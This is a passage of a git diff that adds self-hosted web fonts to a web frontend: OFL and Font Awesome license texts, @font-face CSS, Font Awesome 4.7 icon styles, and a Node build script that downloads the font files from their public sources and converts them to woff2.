which fonts may be shared and improved in partnership +with others. + +The OFL allows the licensed fonts to be used, studied, modified and +redistributed freely as long as they are not sold by themselves. The +fonts, including any derivative works, can be bundled, embedded, +redistributed and/or sold with any software provided that any reserved +names are not used by derivative works. The fonts and derivatives, +however, cannot be released under any other type of license. 
The +requirement for fonts to remain under this license does not apply +to any document created using the fonts or their derivatives. + +DEFINITIONS +"Font Software" refers to the set of files released by the Copyright +Holder(s) under this license and clearly marked as such. This may +include source files, build scripts and documentation. + +"Reserved Font Name" refers to any names specified as such after the +copyright statement(s). + +"Original Version" refers to the collection of Font Software components as +distributed by the Copyright Holder(s). + +"Modified Version" refers to any derivative made by adding to, deleting, +or substituting -- in part or in whole -- any of the components of the +Original Version, by changing formats or by porting the Font Software to a +new environment. + +"Author" refers to any designer, engineer, programmer, technical +writer or other person who contributed to the Font Software. + +PERMISSION & CONDITIONS +Permission is hereby granted, free of charge, to any person obtaining +a copy of the Font Software, to use, study, copy, merge, embed, modify, +redistribute, and sell modified and unmodified copies of the Font +Software, subject to the following conditions: + +1) Neither the Font Software nor any of its individual components, +in Original or Modified Versions, may be sold by itself. + +2) Original or Modified Versions of the Font Software may be bundled, +redistributed and/or sold with any software, provided that each copy +contains the above copyright notice and this license. These can be +included either as stand-alone text files, human-readable headers or +in the appropriate machine-readable metadata fields within text or +binary files as long as those fields can be easily viewed by the user. + +3) No Modified Version of the Font Software may use the Reserved Font +Name(s) unless explicit written permission is granted by the corresponding +Copyright Holder. This restriction only applies to the primary font name as +presented to the users. + +4) The name(s) of the Copyright Holder(s) or the Author(s) of the Font +Software shall not be used to promote, endorse or advertise any +Modified Version, except to acknowledge the contribution(s) of the +Copyright Holder(s) and the Author(s) or with their explicit written +permission. + +5) The Font Software, modified or unmodified, in part or in whole, +must be distributed entirely under this license, and must not be +distributed under any other license. The requirement for fonts to +remain under this license does not apply to any document created +using the Font Software. + +TERMINATION +This license becomes null and void if any of the above conditions are +not met. + +DISCLAIMER +THE FONT SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, +EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO ANY WARRANTIES OF +MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT +OF COPYRIGHT, PATENT, TRADEMARK, OR OTHER RIGHT. IN NO EVENT SHALL THE +COPYRIGHT HOLDER BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, +INCLUDING ANY GENERAL, SPECIAL, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL +DAMAGES, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +FROM, OUT OF THE USE OR INABILITY TO USE THE FONT SOFTWARE OR FROM +OTHER DEALINGS IN THE FONT SOFTWARE. 
diff --git a/services/web/frontend/fonts/STIXTwoMath/STIXTwoMath-Regular.woff2 b/services/web/frontend/fonts/STIXTwoMath/STIXTwoMath-Regular.woff2 new file mode 100644 index 0000000..3b97c9c Binary files /dev/null and b/services/web/frontend/fonts/STIXTwoMath/STIXTwoMath-Regular.woff2 differ diff --git a/services/web/frontend/fonts/STIXTwoMath/stix-two-math.css b/services/web/frontend/fonts/STIXTwoMath/stix-two-math.css new file mode 100644 index 0000000..25ed725 --- /dev/null +++ b/services/web/frontend/fonts/STIXTwoMath/stix-two-math.css @@ -0,0 +1,4 @@ +@font-face { + font-family: 'Stix Two Math'; + src: url('STIXTwoMath-Regular.woff2') format('woff2'); +} diff --git a/services/web/frontend/fonts/build-fonts.mjs b/services/web/frontend/fonts/build-fonts.mjs new file mode 100644 index 0000000..8387509 --- /dev/null +++ b/services/web/frontend/fonts/build-fonts.mjs @@ -0,0 +1,194 @@ +import fs from 'node:fs/promises' +import { createWriteStream } from 'node:fs' +import { basename, join } from 'node:path' +import { tmpdir } from 'node:os' +import { execSync } from 'node:child_process' +import yauzl from 'yauzl' + +// brew install woff2 + +const families = [ + { + folder: 'dm-mono', + url: 'https://github.com/googlefonts/dm-mono', + fonts: [ + 'https://github.com/googlefonts/dm-mono/raw/refs/heads/main/exports/DMMono-Italic.ttf', + 'https://github.com/googlefonts/dm-mono/raw/refs/heads/main/exports/DMMono-Medium.ttf', + 'https://github.com/googlefonts/dm-mono/raw/refs/heads/main/exports/DMMono-MediumItalic.ttf', + 'https://github.com/googlefonts/dm-mono/raw/refs/heads/main/exports/DMMono-Regular.ttf', + ], + }, + { + folder: 'font-awesome', + url: 'https://fontawesome.com/v4/', + archive: 'https://fontawesome.com/v4/assets/font-awesome-4.7.0.zip', + fonts: ['font-awesome-4.7.0/fonts/fontawesome-webfont.woff2'], + }, + { + folder: 'lato', + url: 'https://www.latofonts.com/', + archive: 'https://www.latofonts.com/download/lato2oflweb-zip/', + fonts: [ + 'Lato2OFLWeb/LatoLatin/fonts/LatoLatin-Bold.woff2', + 'Lato2OFLWeb/LatoLatin/fonts/LatoLatin-BoldItalic.woff2', + 'Lato2OFLWeb/LatoLatin/fonts/LatoLatin-Italic.woff2', + 'Lato2OFLWeb/LatoLatin/fonts/LatoLatin-Regular.woff2', + ], + }, + { + folder: 'merriweather', + url: 'https://github.com/SorkinType/Merriweather', + fonts: [ + 'https://github.com/SorkinType/Merriweather/raw/refs/heads/master/fonts/webfonts/Merriweather-Bold.woff2', + 'https://github.com/SorkinType/Merriweather/raw/refs/heads/master/fonts/webfonts/Merriweather-BoldItalic.woff2', + 'https://github.com/SorkinType/Merriweather/raw/refs/heads/master/fonts/webfonts/Merriweather-Italic.woff2', + 'https://github.com/SorkinType/Merriweather/raw/refs/heads/master/fonts/webfonts/Merriweather-Regular.woff2', + ], + license: + 'https://github.com/SorkinType/Merriweather/raw/refs/heads/master/OFL.txt', + }, + { + folder: 'noto-sans', + url: 'https://notofonts.github.io/#latin-greek-cyrillic', + fonts: [ + 'https://github.com/notofonts/notofonts.github.io/raw/refs/heads/main/fonts/NotoSans/full/ttf/NotoSans-Italic.ttf', + 'https://github.com/notofonts/notofonts.github.io/raw/refs/heads/main/fonts/NotoSans/full/ttf/NotoSans-Medium.ttf', + 'https://github.com/notofonts/notofonts.github.io/raw/refs/heads/main/fonts/NotoSans/full/ttf/NotoSans-MediumItalic.ttf', + 'https://github.com/notofonts/notofonts.github.io/raw/refs/heads/main/fonts/NotoSans/full/ttf/NotoSans-Regular.ttf', + 
'https://github.com/notofonts/notofonts.github.io/raw/refs/heads/main/fonts/NotoSans/full/ttf/NotoSans-SemiBold.ttf',
+      'https://github.com/notofonts/notofonts.github.io/raw/refs/heads/main/fonts/NotoSans/full/ttf/NotoSans-SemiBoldItalic.ttf',
+    ],
+    license:
+      'https://raw.githubusercontent.com/notofonts/latin-greek-cyrillic/refs/heads/main/OFL.txt',
+  },
+  {
+    folder: 'noto-serif',
+    url: 'https://notofonts.github.io/#latin-greek-cyrillic',
+    fonts: [
+      'https://github.com/notofonts/notofonts.github.io/raw/refs/heads/main/fonts/NotoSerif/unhinted/slim-variable-ttf/NotoSerif%5Bwght%5D.ttf',
+      'https://github.com/notofonts/notofonts.github.io/raw/refs/heads/main/fonts/NotoSerif/unhinted/slim-variable-ttf/NotoSerif-Italic%5Bwght%5D.ttf',
+    ],
+    license:
+      'https://raw.githubusercontent.com/notofonts/latin-greek-cyrillic/refs/heads/main/OFL.txt',
+  },
+  {
+    folder: 'open-dyslexic-mono',
+    url: 'https://github.com/antijingoist/opendyslexic',
+    fonts: [
+      // fetch via the raw endpoint: a /blob/ page URL returns HTML, not the font
+      'https://github.com/antijingoist/open-dyslexic/raw/master/otf/OpenDyslexicMono-Regular.otf',
+    ],
+    license: 'https://github.com/antijingoist/opendyslexic/raw/master/OFL.txt',
+  },
+  {
+    folder: 'open-sans',
+    url: 'https://github.com/googlefonts/opensans',
+    fonts: [
+      'https://github.com/googlefonts/opensans/raw/refs/heads/main/fonts/ttf/OpenSans-Bold.ttf',
+      'https://github.com/googlefonts/opensans/raw/refs/heads/main/fonts/ttf/OpenSans-Light.ttf',
+      'https://github.com/googlefonts/opensans/raw/refs/heads/main/fonts/ttf/OpenSans-Regular.ttf',
+      'https://github.com/googlefonts/opensans/raw/refs/heads/main/fonts/ttf/OpenSans-SemiBold.ttf',
+    ],
+    license:
+      'https://raw.githubusercontent.com/googlefonts/opensans/refs/heads/main/OFL.txt',
+  },
+  {
+    folder: 'source-code-pro',
+    url: 'https://github.com/adobe-fonts/source-code-pro',
+    fonts: [
+      'https://github.com/adobe-fonts/source-code-pro/raw/refs/heads/release/WOFF2/TTF/SourceCodePro-Regular.ttf.woff2',
+    ],
+    license:
+      'https://raw.githubusercontent.com/adobe-fonts/source-code-pro/refs/heads/release/LICENSE.md',
+  },
+  {
+    folder: 'STIXTwoMath',
+    url: 'https://github.com/stipub/stixfonts',
+    fonts: [
+      'https://github.com/stipub/stixfonts/raw/refs/heads/master/fonts/static_otf_woff2/STIXTwoMath-Regular.woff2',
+    ],
+    license:
+      'https://raw.githubusercontent.com/stipub/stixfonts/refs/heads/master/OFL.txt',
+  },
+]
+
+const fetchFile = async (url, path) => {
+  console.log(`${url}\n${path}`)
+  const response = await fetch(url)
+  if (!response.ok) {
+    throw new Error(response.statusText)
+  }
+  await fs.writeFile(path, response.body)
+}
+
+for (const family of families) {
+  if (!family.folder) {
+    throw new Error('Missing family information')
+  }
+
+  await fs.mkdir(family.folder, { recursive: true })
+
+  const fonts = new Set(family.fonts)
+
+  if (family.archive) {
+    // download the archive to a temp directory, then extract only the listed fonts
+    const dir = await fs.mkdtemp(join(tmpdir(), 'fonts-'))
+    const filename = decodeURIComponent(basename(family.archive))
+    const path = `${dir}/${filename}`
+    await fetchFile(family.archive, path)
+
+    await new Promise((resolve, reject) => {
+      // lazyEntries: the next zip entry is read only when readEntry() is called
+      yauzl.open(path, { lazyEntries: true }, (err, zipfile) => {
+        if (err) {
+          reject(err)
+        } else {
+          zipfile.on('entry', entry => {
+            if (fonts.has(entry.fileName)) {
+              console.log(entry.fileName)
+              zipfile.openReadStream(entry, (err, readStream) => {
+                if (err) {
+                  reject(err)
+                } else {
+                  const path = `${family.folder}/${basename(entry.fileName)}`
+                  const output = createWriteStream(path)
+                  readStream.on('end', async () => {
+                    output.close()
+                    if (path.endsWith('.ttf')) {
+                      
execSync(`woff2_compress "${path}"`) + await fs.unlink(path) + } + zipfile.readEntry() + }) + readStream.pipe(output) + } + }) + } else { + zipfile.readEntry() + } + }) + zipfile.on('error', reject) + zipfile.on('end', resolve) + zipfile.readEntry() + } + }) + }) + + await fs.unlink(path) + } else { + for (const url of fonts) { + const filename = decodeURIComponent(basename(url)) + const path = `${family.folder}/${filename}` + await fetchFile(url, path) + + if (path.endsWith('.ttf')) { + execSync(`woff2_compress "${path}"`) + await fs.unlink(path) + } + } + } + + if (family.license) { + const url = family.license + const filename = decodeURIComponent(basename(url)) + const path = `${family.folder}/${filename}` + await fetchFile(url, path) + } +} diff --git a/services/web/frontend/fonts/dm-mono/DMMono-Italic.woff2 b/services/web/frontend/fonts/dm-mono/DMMono-Italic.woff2 new file mode 100644 index 0000000..404632f Binary files /dev/null and b/services/web/frontend/fonts/dm-mono/DMMono-Italic.woff2 differ diff --git a/services/web/frontend/fonts/dm-mono/DMMono-Medium.woff2 b/services/web/frontend/fonts/dm-mono/DMMono-Medium.woff2 new file mode 100644 index 0000000..aa5f78d Binary files /dev/null and b/services/web/frontend/fonts/dm-mono/DMMono-Medium.woff2 differ diff --git a/services/web/frontend/fonts/dm-mono/DMMono-MediumItalic.woff2 b/services/web/frontend/fonts/dm-mono/DMMono-MediumItalic.woff2 new file mode 100644 index 0000000..c89c978 Binary files /dev/null and b/services/web/frontend/fonts/dm-mono/DMMono-MediumItalic.woff2 differ diff --git a/services/web/frontend/fonts/dm-mono/DMMono-Regular.woff2 b/services/web/frontend/fonts/dm-mono/DMMono-Regular.woff2 new file mode 100644 index 0000000..2e26b5a Binary files /dev/null and b/services/web/frontend/fonts/dm-mono/DMMono-Regular.woff2 differ diff --git a/services/web/frontend/fonts/dm-mono/OFL.txt b/services/web/frontend/fonts/dm-mono/OFL.txt new file mode 100644 index 0000000..01450af --- /dev/null +++ b/services/web/frontend/fonts/dm-mono/OFL.txt @@ -0,0 +1,93 @@ +Copyright 2020 The DM Mono Project Authors (https://www.github.com/googlefonts/dm-mono) + +This Font Software is licensed under the SIL Open Font License, Version 1.1. +This license is copied below, and is also available with a FAQ at: +http://scripts.sil.org/OFL + + +----------------------------------------------------------- +SIL OPEN FONT LICENSE Version 1.1 - 26 February 2007 +----------------------------------------------------------- + +PREAMBLE +The goals of the Open Font License (OFL) are to stimulate worldwide +development of collaborative font projects, to support the font creation +efforts of academic and linguistic communities, and to provide a free and +open framework in which fonts may be shared and improved in partnership +with others. + +The OFL allows the licensed fonts to be used, studied, modified and +redistributed freely as long as they are not sold by themselves. The +fonts, including any derivative works, can be bundled, embedded, +redistributed and/or sold with any software provided that any reserved +names are not used by derivative works. The fonts and derivatives, +however, cannot be released under any other type of license. The +requirement for fonts to remain under this license does not apply +to any document created using the fonts or their derivatives. + +DEFINITIONS +"Font Software" refers to the set of files released by the Copyright +Holder(s) under this license and clearly marked as such. 
This may +include source files, build scripts and documentation. + +"Reserved Font Name" refers to any names specified as such after the +copyright statement(s). + +"Original Version" refers to the collection of Font Software components as +distributed by the Copyright Holder(s). + +"Modified Version" refers to any derivative made by adding to, deleting, +or substituting -- in part or in whole -- any of the components of the +Original Version, by changing formats or by porting the Font Software to a +new environment. + +"Author" refers to any designer, engineer, programmer, technical +writer or other person who contributed to the Font Software. + +PERMISSION & CONDITIONS +Permission is hereby granted, free of charge, to any person obtaining +a copy of the Font Software, to use, study, copy, merge, embed, modify, +redistribute, and sell modified and unmodified copies of the Font +Software, subject to the following conditions: + +1) Neither the Font Software nor any of its individual components, +in Original or Modified Versions, may be sold by itself. + +2) Original or Modified Versions of the Font Software may be bundled, +redistributed and/or sold with any software, provided that each copy +contains the above copyright notice and this license. These can be +included either as stand-alone text files, human-readable headers or +in the appropriate machine-readable metadata fields within text or +binary files as long as those fields can be easily viewed by the user. + +3) No Modified Version of the Font Software may use the Reserved Font +Name(s) unless explicit written permission is granted by the corresponding +Copyright Holder. This restriction only applies to the primary font name as +presented to the users. + +4) The name(s) of the Copyright Holder(s) or the Author(s) of the Font +Software shall not be used to promote, endorse or advertise any +Modified Version, except to acknowledge the contribution(s) of the +Copyright Holder(s) and the Author(s) or with their explicit written +permission. + +5) The Font Software, modified or unmodified, in part or in whole, +must be distributed entirely under this license, and must not be +distributed under any other license. The requirement for fonts to +remain under this license does not apply to any document created +using the Font Software. + +TERMINATION +This license becomes null and void if any of the above conditions are +not met. + +DISCLAIMER +THE FONT SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, +EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO ANY WARRANTIES OF +MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT +OF COPYRIGHT, PATENT, TRADEMARK, OR OTHER RIGHT. IN NO EVENT SHALL THE +COPYRIGHT HOLDER BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, +INCLUDING ANY GENERAL, SPECIAL, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL +DAMAGES, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +FROM, OUT OF THE USE OR INABILITY TO USE THE FONT SOFTWARE OR FROM +OTHER DEALINGS IN THE FONT SOFTWARE. 
diff --git a/services/web/frontend/fonts/dm-mono/dm-mono.css b/services/web/frontend/fonts/dm-mono/dm-mono.css new file mode 100644 index 0000000..44c1828 --- /dev/null +++ b/services/web/frontend/fonts/dm-mono/dm-mono.css @@ -0,0 +1,31 @@ +@font-face { + font-family: 'DM Mono'; + font-style: normal; + font-weight: 400; + font-display: fallback; + src: url('DMMono-Regular.woff2') format('woff2'); +} + +@font-face { + font-family: 'DM Mono'; + font-style: italic; + font-weight: 400; + font-display: fallback; + src: url('DMMono-Italic.woff2') format('woff2'); +} + +@font-face { + font-family: 'DM Mono'; + font-style: normal; + font-weight: 500; + font-display: fallback; + src: url('DMMono-Medium.woff2') format('woff2'); +} + +@font-face { + font-family: 'DM Mono'; + font-style: italic; + font-weight: 500; + font-display: fallback; + src: url('DMMono-MediumItalic.woff2') format('woff2'); +} diff --git a/services/web/frontend/fonts/font-awesome/LICENSE.txt b/services/web/frontend/fonts/font-awesome/LICENSE.txt new file mode 100644 index 0000000..e69c5e3 --- /dev/null +++ b/services/web/frontend/fonts/font-awesome/LICENSE.txt @@ -0,0 +1,165 @@ +Fonticons, Inc. (https://fontawesome.com) + +-------------------------------------------------------------------------------- + +Font Awesome Free License + +Font Awesome Free is free, open source, and GPL friendly. You can use it for +commercial projects, open source projects, or really almost whatever you want. +Full Font Awesome Free license: https://fontawesome.com/license/free. + +-------------------------------------------------------------------------------- + +# Icons: CC BY 4.0 License (https://creativecommons.org/licenses/by/4.0/) + +The Font Awesome Free download is licensed under a Creative Commons +Attribution 4.0 International License and applies to all icons packaged +as SVG and JS file types. + +-------------------------------------------------------------------------------- + +# Fonts: SIL OFL 1.1 License + +In the Font Awesome Free download, the SIL OFL license applies to all icons +packaged as web and desktop font files. + +Copyright (c) 2024 Fonticons, Inc. (https://fontawesome.com) +with Reserved Font Name: "Font Awesome". + +This Font Software is licensed under the SIL Open Font License, Version 1.1. +This license is copied below, and is also available with a FAQ at: +http://scripts.sil.org/OFL + +SIL OPEN FONT LICENSE +Version 1.1 - 26 February 2007 + +PREAMBLE +The goals of the Open Font License (OFL) are to stimulate worldwide +development of collaborative font projects, to support the font creation +efforts of academic and linguistic communities, and to provide a free and +open framework in which fonts may be shared and improved in partnership +with others. + +The OFL allows the licensed fonts to be used, studied, modified and +redistributed freely as long as they are not sold by themselves. The +fonts, including any derivative works, can be bundled, embedded, +redistributed and/or sold with any software provided that any reserved +names are not used by derivative works. The fonts and derivatives, +however, cannot be released under any other type of license. The +requirement for fonts to remain under this license does not apply +to any document created using the fonts or their derivatives. + +DEFINITIONS +"Font Software" refers to the set of files released by the Copyright +Holder(s) under this license and clearly marked as such. This may +include source files, build scripts and documentation. 
+ +"Reserved Font Name" refers to any names specified as such after the +copyright statement(s). + +"Original Version" refers to the collection of Font Software components as +distributed by the Copyright Holder(s). + +"Modified Version" refers to any derivative made by adding to, deleting, +or substituting — in part or in whole — any of the components of the +Original Version, by changing formats or by porting the Font Software to a +new environment. + +"Author" refers to any designer, engineer, programmer, technical +writer or other person who contributed to the Font Software. + +PERMISSION & CONDITIONS +Permission is hereby granted, free of charge, to any person obtaining +a copy of the Font Software, to use, study, copy, merge, embed, modify, +redistribute, and sell modified and unmodified copies of the Font +Software, subject to the following conditions: + +1) Neither the Font Software nor any of its individual components, +in Original or Modified Versions, may be sold by itself. + +2) Original or Modified Versions of the Font Software may be bundled, +redistributed and/or sold with any software, provided that each copy +contains the above copyright notice and this license. These can be +included either as stand-alone text files, human-readable headers or +in the appropriate machine-readable metadata fields within text or +binary files as long as those fields can be easily viewed by the user. + +3) No Modified Version of the Font Software may use the Reserved Font +Name(s) unless explicit written permission is granted by the corresponding +Copyright Holder. This restriction only applies to the primary font name as +presented to the users. + +4) The name(s) of the Copyright Holder(s) or the Author(s) of the Font +Software shall not be used to promote, endorse or advertise any +Modified Version, except to acknowledge the contribution(s) of the +Copyright Holder(s) and the Author(s) or with their explicit written +permission. + +5) The Font Software, modified or unmodified, in part or in whole, +must be distributed entirely under this license, and must not be +distributed under any other license. The requirement for fonts to +remain under this license does not apply to any document created +using the Font Software. + +TERMINATION +This license becomes null and void if any of the above conditions are +not met. + +DISCLAIMER +THE FONT SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, +EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO ANY WARRANTIES OF +MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT +OF COPYRIGHT, PATENT, TRADEMARK, OR OTHER RIGHT. IN NO EVENT SHALL THE +COPYRIGHT HOLDER BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, +INCLUDING ANY GENERAL, SPECIAL, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL +DAMAGES, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +FROM, OUT OF THE USE OR INABILITY TO USE THE FONT SOFTWARE OR FROM +OTHER DEALINGS IN THE FONT SOFTWARE. + +-------------------------------------------------------------------------------- + +# Code: MIT License (https://opensource.org/licenses/MIT) + +In the Font Awesome Free download, the MIT license applies to all non-font and +non-icon files. + +Copyright 2024 Fonticons, Inc. 
+ +Permission is hereby granted, free of charge, to any person obtaining a copy of +this software and associated documentation files (the "Software"), to deal in the +Software without restriction, including without limitation the rights to use, copy, +modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, +and to permit persons to whom the Software is furnished to do so, subject to the +following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, +INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A +PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT +HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION +OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE +SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. + +-------------------------------------------------------------------------------- + +# Attribution + +Attribution is required by MIT, SIL OFL, and CC BY licenses. Downloaded Font +Awesome Free files already contain embedded comments with sufficient +attribution, so you shouldn't need to do anything additional when using these +files normally. + +We've kept attribution comments terse, so we ask that you do not actively work +to remove them from files, especially code. They're a great way for folks to +learn about Font Awesome. + +-------------------------------------------------------------------------------- + +# Brand Icons + +All brand icons are trademarks of their respective owners. The use of these +trademarks does not indicate endorsement of the trademark holder by Font +Awesome, nor vice versa. **Please do not use brand logos for any purpose except +to represent the company, product, or service to which they refer.** diff --git a/services/web/frontend/fonts/font-awesome/font-awesome.css b/services/web/frontend/fonts/font-awesome/font-awesome.css new file mode 100644 index 0000000..602f34f --- /dev/null +++ b/services/web/frontend/fonts/font-awesome/font-awesome.css @@ -0,0 +1,2334 @@ +/*! 
+ * Font Awesome 4.7.0 by @davegandy - http://fontawesome.io - @fontawesome + * License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License) + */ +@font-face { + font-family: 'FontAwesome'; + src: url('fontawesome-webfont.woff2') format('woff2'); + font-weight: normal; + font-style: normal; +} +.fa { + display: inline-block; + font: normal normal normal 14px/1 FontAwesome; + font-size: inherit; + text-rendering: auto; + -webkit-font-smoothing: antialiased; + -moz-osx-font-smoothing: grayscale; +} +/* makes the font 33% larger relative to the icon container */ +.fa-lg { + font-size: 1.33333333em; + line-height: 0.75em; + vertical-align: -15%; +} +.fa-2x { + font-size: 2em; +} +.fa-3x { + font-size: 3em; +} +.fa-4x { + font-size: 4em; +} +.fa-5x { + font-size: 5em; +} +.fa-fw { + width: 1.28571429em; + text-align: center; +} +.fa-ul { + padding-left: 0; + margin-left: 2.14285714em; + list-style-type: none; +} +.fa-ul > li { + position: relative; +} +.fa-li { + position: absolute; + left: -2.14285714em; + width: 2.14285714em; + top: 0.14285714em; + text-align: center; +} +.fa-li.fa-lg { + left: -1.85714286em; +} +.fa-border { + padding: 0.2em 0.25em 0.15em; + border: solid 0.08em #eeeeee; + border-radius: 0.1em; +} +.fa-pull-left { + float: left; +} +.fa-pull-right { + float: right; +} +.fa.fa-pull-left { + margin-right: 0.3em; +} +.fa.fa-pull-right { + margin-left: 0.3em; +} +/* Deprecated as of 4.4.0 */ +.pull-right { + float: right; +} +.pull-left { + float: left; +} +.fa.pull-left { + margin-right: 0.3em; +} +.fa.pull-right { + margin-left: 0.3em; +} +.fa-spin { + -webkit-animation: fa-spin 2s infinite linear; + animation: fa-spin 2s infinite linear; +} +.fa-pulse { + -webkit-animation: fa-spin 1s infinite steps(8); + animation: fa-spin 1s infinite steps(8); +} +@-webkit-keyframes fa-spin { + 0% { + -webkit-transform: rotate(0deg); + transform: rotate(0deg); + } + 100% { + -webkit-transform: rotate(359deg); + transform: rotate(359deg); + } +} +@keyframes fa-spin { + 0% { + -webkit-transform: rotate(0deg); + transform: rotate(0deg); + } + 100% { + -webkit-transform: rotate(359deg); + transform: rotate(359deg); + } +} +.fa-rotate-90 { + -ms-filter: 'progid:DXImageTransform.Microsoft.BasicImage(rotation=1)'; + -webkit-transform: rotate(90deg); + -ms-transform: rotate(90deg); + transform: rotate(90deg); +} +.fa-rotate-180 { + -ms-filter: 'progid:DXImageTransform.Microsoft.BasicImage(rotation=2)'; + -webkit-transform: rotate(180deg); + -ms-transform: rotate(180deg); + transform: rotate(180deg); +} +.fa-rotate-270 { + -ms-filter: 'progid:DXImageTransform.Microsoft.BasicImage(rotation=3)'; + -webkit-transform: rotate(270deg); + -ms-transform: rotate(270deg); + transform: rotate(270deg); +} +.fa-flip-horizontal { + -ms-filter: 'progid:DXImageTransform.Microsoft.BasicImage(rotation=0, mirror=1)'; + -webkit-transform: scale(-1, 1); + -ms-transform: scale(-1, 1); + transform: scale(-1, 1); +} +.fa-flip-vertical { + -ms-filter: 'progid:DXImageTransform.Microsoft.BasicImage(rotation=2, mirror=1)'; + -webkit-transform: scale(1, -1); + -ms-transform: scale(1, -1); + transform: scale(1, -1); +} +:root .fa-rotate-90, +:root .fa-rotate-180, +:root .fa-rotate-270, +:root .fa-flip-horizontal, +:root .fa-flip-vertical { + filter: none; +} +.fa-stack { + position: relative; + display: inline-block; + width: 2em; + height: 2em; + line-height: 2em; + vertical-align: middle; +} +.fa-stack-1x, +.fa-stack-2x { + position: absolute; + left: 0; + width: 100%; + text-align: center; +} +.fa-stack-1x { 
+ line-height: inherit; +} +.fa-stack-2x { + font-size: 2em; +} +.fa-inverse { + color: #ffffff; +} +/* Font Awesome uses the Unicode Private Use Area (PUA) to ensure screen + readers do not read off random characters that represent icons */ +.fa-glass:before { + content: '\f000'; +} +.fa-music:before { + content: '\f001'; +} +.fa-search:before { + content: '\f002'; +} +.fa-envelope-o:before { + content: '\f003'; +} +.fa-heart:before { + content: '\f004'; +} +.fa-star:before { + content: '\f005'; +} +.fa-star-o:before { + content: '\f006'; +} +.fa-user:before { + content: '\f007'; +} +.fa-film:before { + content: '\f008'; +} +.fa-th-large:before { + content: '\f009'; +} +.fa-th:before { + content: '\f00a'; +} +.fa-th-list:before { + content: '\f00b'; +} +.fa-check:before { + content: '\f00c'; +} +.fa-remove:before, +.fa-close:before, +.fa-times:before { + content: '\f00d'; +} +.fa-search-plus:before { + content: '\f00e'; +} +.fa-search-minus:before { + content: '\f010'; +} +.fa-power-off:before { + content: '\f011'; +} +.fa-signal:before { + content: '\f012'; +} +.fa-gear:before, +.fa-cog:before { + content: '\f013'; +} +.fa-trash-o:before { + content: '\f014'; +} +.fa-home:before { + content: '\f015'; +} +.fa-file-o:before { + content: '\f016'; +} +.fa-clock-o:before { + content: '\f017'; +} +.fa-road:before { + content: '\f018'; +} +.fa-download:before { + content: '\f019'; +} +.fa-arrow-circle-o-down:before { + content: '\f01a'; +} +.fa-arrow-circle-o-up:before { + content: '\f01b'; +} +.fa-inbox:before { + content: '\f01c'; +} +.fa-play-circle-o:before { + content: '\f01d'; +} +.fa-rotate-right:before, +.fa-repeat:before { + content: '\f01e'; +} +.fa-refresh:before { + content: '\f021'; +} +.fa-list-alt:before { + content: '\f022'; +} +.fa-lock:before { + content: '\f023'; +} +.fa-flag:before { + content: '\f024'; +} +.fa-headphones:before { + content: '\f025'; +} +.fa-volume-off:before { + content: '\f026'; +} +.fa-volume-down:before { + content: '\f027'; +} +.fa-volume-up:before { + content: '\f028'; +} +.fa-qrcode:before { + content: '\f029'; +} +.fa-barcode:before { + content: '\f02a'; +} +.fa-tag:before { + content: '\f02b'; +} +.fa-tags:before { + content: '\f02c'; +} +.fa-book:before { + content: '\f02d'; +} +.fa-bookmark:before { + content: '\f02e'; +} +.fa-print:before { + content: '\f02f'; +} +.fa-camera:before { + content: '\f030'; +} +.fa-font:before { + content: '\f031'; +} +.fa-bold:before { + content: '\f032'; +} +.fa-italic:before { + content: '\f033'; +} +.fa-text-height:before { + content: '\f034'; +} +.fa-text-width:before { + content: '\f035'; +} +.fa-align-left:before { + content: '\f036'; +} +.fa-align-center:before { + content: '\f037'; +} +.fa-align-right:before { + content: '\f038'; +} +.fa-align-justify:before { + content: '\f039'; +} +.fa-list:before { + content: '\f03a'; +} +.fa-dedent:before, +.fa-outdent:before { + content: '\f03b'; +} +.fa-indent:before { + content: '\f03c'; +} +.fa-video-camera:before { + content: '\f03d'; +} +.fa-photo:before, +.fa-image:before, +.fa-picture-o:before { + content: '\f03e'; +} +.fa-pencil:before { + content: '\f040'; +} +.fa-map-marker:before { + content: '\f041'; +} +.fa-adjust:before { + content: '\f042'; +} +.fa-tint:before { + content: '\f043'; +} +.fa-edit:before, +.fa-pencil-square-o:before { + content: '\f044'; +} +.fa-share-square-o:before { + content: '\f045'; +} +.fa-check-square-o:before { + content: '\f046'; +} +.fa-arrows:before { + content: '\f047'; +} +.fa-step-backward:before { + content: '\f048'; +} 
